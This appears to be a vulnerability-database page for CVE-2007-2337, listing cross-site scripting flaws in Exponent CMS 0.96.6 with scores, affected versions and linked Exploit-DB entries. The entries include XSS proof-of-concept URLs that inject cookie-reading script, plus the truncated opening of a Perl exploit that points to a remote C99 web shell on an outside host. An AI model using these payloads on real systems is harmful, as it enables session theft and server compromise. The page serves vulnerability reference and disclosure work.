CVE-2007-2337
published 2007-04-27CVE-2007-2337: Multiple cross-site scripting (XSS) vulnerabilities in Exponent CMS 0.96.6 Alpha and earlier allow remote attackers to inject arbitrary web script or HTML via…
PriorityP419medium4.3CVSS 2.0
AVNACMAuNCNIPAN
EXPLOIT
EPSS
1.82%
76.1th percentile
Multiple cross-site scripting (XSS) vulnerabilities in Exponent CMS 0.96.6 Alpha and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) url parameter to (a) magpie_debug.php and (b) magpie_simple.php in external/magpierss/scripts/, the (2) rss_url parameter to (c) magpie_slashbox.php in external/magpierss/scripts/, and the (3) body parameter to the (d) weblogmodule (aka Weblog Comments) module.
Affected
7 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| oicgroup | exponent_cms | <= 0.96.6 | — |
| oicgroup | exponent_cms | — | — |
| oicgroup | exponent_cms | — | — |
| oicgroup | exponent_cms | — | — |
| oicgroup | exponent_cms | — | — |
| oicgroup | exponent_cms | — | — |
| oicgroup | exponent_cms | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Vivvo CMS 3.4 - Multiple Vulnerabilities
exploitdb·2008-10-19
CVE-2007-3939 Vivvo CMS 3.4 - Multiple Vulnerabilities
Vivvo CMS 3.4 - Multiple Vulnerabilities
---
#!/usr/bin/perl
#Vivvo CMS Destroyer
#[email protected]
#By Xianur0
#-------------CREDITS-------------
#http://milw0rm.com/exploits/4192
#http://milw0rm.com/exploits/3326
#http://milw0rm.com/exploits/2339
#http://milw0rm.com/exploits/2337
#-------------/CREDITS-------------
print "\n Vivvo CMS Destroyer By Xianur0\n";
#-----------CONFIG----------
$SHELL='http://y4m15p33dy.vilabol.uol.com.br/c99.txt';
$textshell = 'C99Shell v.';
#----------/CONFIG----------
use LWP::UserAgent;
use Switch;
my $path = $ARGV[0];
$path = shift || &uso;
sub uso { print "\nUse: vivvo.pl [URI to Vivvo CMS]\n"; exit;}
$ua = LWP::UserAgent->new;
$ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.17) Gecko/20080829 Firefox/2.0.0.17");
$req = HTTP::Request->
Exploit-DB
Exponent CMS 0.96.5/0.96.6 - 'magpie_debug.php?url' Cross-Site Scripting
exploitdb·2007-04-20
CVE-2007-2337 Exponent CMS 0.96.5/0.96.6 - 'magpie_debug.php?url' Cross-Site Scripting
Exponent CMS 0.96.5/0.96.6 - 'magpie_debug.php?url' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/23574/info
Exponent CMS is prone to multiple input-validation vulnerabilities because the application fails to properly sanitize user-supplied input.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, execute arbitrary script code in the context of the webserver process, control how the site is rendered to the user, compromise the application, obtain sensitive information, and access or modify data.
http://www.example.com/external/magpierss/scripts/magpie_debug.php?url= alert(document.cookie)
Exploit-DB
Exponent CMS 0.96.5/0.96.6 - 'magpie_slashbox.php?rss_url' Cross-Site Scripting
exploitdb·2007-04-20
CVE-2007-2337 Exponent CMS 0.96.5/0.96.6 - 'magpie_slashbox.php?rss_url' Cross-Site Scripting
Exponent CMS 0.96.5/0.96.6 - 'magpie_slashbox.php?rss_url' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/23574/info
Exponent CMS is prone to multiple input-validation vulnerabilities because the application fails to properly sanitize user-supplied input.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, execute arbitrary script code in the context of the webserver process, control how the site is rendered to the user, compromise the application, obtain sensitive information, and access or modify data.
http://www.example.com/external/magpierss/scripts/magpie_slashbox.php?rss_url= alert(document.cookie)
No writeups or analysis indexed.
http://osvdb.org/35640http://osvdb.org/35641http://osvdb.org/35642http://osvdb.org/35643http://www.bugtraq.ir/articles/advisory/exponent_multiple_vulnerabilities/10http://www.securityfocus.com/bid/23574https://exchange.xforce.ibmcloud.com/vulnerabilities/34077http://osvdb.org/35640http://osvdb.org/35641http://osvdb.org/35642http://osvdb.org/35643http://www.bugtraq.ir/articles/advisory/exponent_multiple_vulnerabilities/10http://www.securityfocus.com/bid/23574https://exchange.xforce.ibmcloud.com/vulnerabilities/34077
2007-04-27
Published